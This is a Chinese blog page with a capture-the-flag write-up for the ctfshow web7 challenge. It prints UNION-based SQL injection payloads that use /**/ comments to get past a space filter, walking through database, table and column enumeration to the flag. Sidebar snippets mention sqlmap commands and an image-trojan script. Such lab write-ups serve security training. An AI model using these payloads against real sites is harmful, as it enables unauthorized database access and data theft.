ctfshow WEB web7

最新推荐文章于 2025-06-15 17:36:11 发布

燕雀安知鸿鹄之志哉.

最新推荐文章于 2025-06-15 17:36:11 发布

阅读量252

点赞数 3

分类专栏： CTFshow秀文章标签：数据库 sql web安全网络安全网络

本文链接：https://blog.youkuaiyun.com/weixin_68416970/article/details/146539401

版权

CTFshow秀专栏收录该内容

42 篇文章

订阅专栏

访问页面是这样的，随便点开一个页面发现 URL 里面有一个参数 id，这十有八九就是 SQL注入了

经过不断尝试......

查看回显位置

-1/**/union/**/select/**/1,2,3

查看数据库名

-1/**/union/**/select/**/1,database(),3

查看库中表名

-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3

查看表中列名

-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name="flag"),3

查看列下数据

-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

燕雀安知鸿鹄之志哉.

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctfshow WEB web2

weixin_68416970的博客

03-24

259

ctfshow WEB web2

CTFSHOW-web（7/11）

weixin_51706044的博客

06-15

521

文章目录WEB07WEB11 WEB07 进入目录可以发觉到本题考察的是sql盲注尝试注入经过测试，可以发现本题过滤了空格，在这里可以使用/**/进行代替又是空格绕过，之前刚做过的在CTFHUB上空格绕过题，具体详细就不再细说直接操作吧爆数据库 python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" --dbs --tamper "spa

参与评论您还未登录，请先登录后发表或查看评论

ctfshow web7

meiyouis的博客

05-08

759

打开第一个链接，发现url部分有变化，出现了id=1，猜测存在sql注入，为数字型注入，并且过滤了空格和单引号。经过测试这里过滤了空格，可以使用/**/来过滤代替。使用该语句对web7的表名进行爆破，得到flag。也可以使用sqlmap来进行注入得到flag。使用如下语句来使用sqlmap进行sql注入。并且也过滤了单引号，这里使用双引号来代替。得到数据库名，接着对web7进行注入。在知道文件路径的情况下，可以使用。使用该语句来获取flag的内容。出现页面回显，关键字flag。

ctfshow WEB web10

weixin_68416970的博客

04-12

308

ctfshow WEB web10

ctfshow web系列

hanjinming110的博客

10-31

1995

介绍ctfshow中web系列

ctfshow WEB web14

weixin_68416970的博客

04-13

786

ctfshow WEB web14

ctfshow web入门 web87

2401_83272517的博客

05-25

1253

入门2年半还没有入门的菜坤的日常wp

ctfshow CTFshow web1 wp

jwkaaaaaa的博客

07-14

388

flag在指定用户的密码中.

ctfshow WEB web3

weixin_68416970的博客

03-24

447

ctfshow WEB web3

ctfshow web184 正则爆破脚本0x16进制

10-21

ctfshow web184 正则爆破脚本0x16进制

CTFSHOW web164 PNG二次渲染脚本（生成图片马）

05-04

这段PHP代码创建了一个32x32的真彩色图片，并将一个数组中的RGB值作为像素颜色填充到图片上，最后将图片保存为名为"2.png"的文件。另外，这段代码还暗藏了一个木马内容，可以通过GET请求调用POST请求中的参数作为...

ctfshow web214 时间盲注标准脚本

10-21

ctfshow web214 时间盲注标准脚本

Docker + PyFlink1.17 数据写入 MySQL

最新发布

开码河粉

06-15

270

docker, flink 1.17 , mysql，实现数据etl

Python Shelve 模块详解：高效处理大文件的持久化字典

静水深流

06-15

708

Python shelve模块：轻量级数据持久化工具 Python的shelve模块提供了一种字典式的数据持久化方案，将键值对存储在磁盘而非内存中，特别适合处理大文件。与普通字典不同，shelve通过按需访问磁盘内容实现了高效内存管理，支持字典常规操作，但限制键必须为字符串。其持久化特性使得数据在程序关闭后仍可保留，适合地址簿管理等场景。不过，shelve依赖pickle模块，存在安全风险，且不支持并发访问。对于需要跨会话保存又无需复杂数据库的小型项目，shelve提供了一种简单有效的解决方案，但在处理不可

大模型工作流Dify面试题及参考答案

大模型大数据攻城狮的专栏

06-12

732

设计一个基于 Dify 的智能摘要与重点提取 Agent，需结合Prompt 工程、模型能力配置和工作流优化，确保对长文本的高效解析和关键信息提炼。1. 明确任务需求与输入输出输入：长文本内容（如文章、报告、会议记录）或文本 URL输出摘要：简洁概括原文核心内容，控制在原文长度的 10%-20%重点列表：分点列出关键数据、结论、行动项等可选：关键词提取、情感倾向分析示例场景输入：一篇 5000 字的行业报告。

PostgreSQL --数据库操作

2301_81259717的博客

06-11

901

具体说来，就是它必须要有你想备份的表的读权限，因此为了备份整个数据库你几乎总是必须以一个数据库超级用户来运行它(如果你没有足够的特权来备份整个数据库，你仍然可以使用诸如n schema 或-t table选项来备份该数据库中你能够访问的部分)不管怎样，你将只能得到一个部分恢复的数据库。由 pg_dump 创建的备份在内部是一致的，也就是说,转储表现了 pg_dump开始运行时刻的数据库快照,且在 pg_dump 运行过程中发生的更新将不会被转储pg_dump 工作的时候并不阻塞其他的对数据库的操作。

Django 5.2.3 构建的图书管理系统

keny-大成的博客

06-15

168

摘要：本文介绍了使用Django 5.2.3构建的图书管理系统实现方案。系统包含作者和图书模型，支持后台管理配置、视图和模板展示。主要功能包含图书/作者列表展示、详情页、搜索及分页功能。模型设计包括作者信息（姓名、生日、简介）和图书信息（书名、ISBN、类型、库存等）。后台管理界面提供筛选、搜索和排序功能。系统采用Django的类视图实现，并配置了相应的URL路由和HTML模板。

Flink CDC MySQL 表字段定义为 decimal 输出乱码问题优雅解决方式

RodJohnsonDoctor的专栏

06-15

140

Flink CDC MySQL decimal字段乱码问题解决方案摘要：在使用Flink CDC 2.4.0捕获MySQL表数据时，decimal类型字段可能出现乱码问题。这是由于Debezium默认将decimal转为二进制格式，与Flink解析方式不兼容。解决方案是通过自定义JsonDebeziumDeserializationSchema，在配置中设置decimal.format为"numeric"，确保数值格式正确解析。实现步骤包括添加必要依赖、配置自定义转换规则.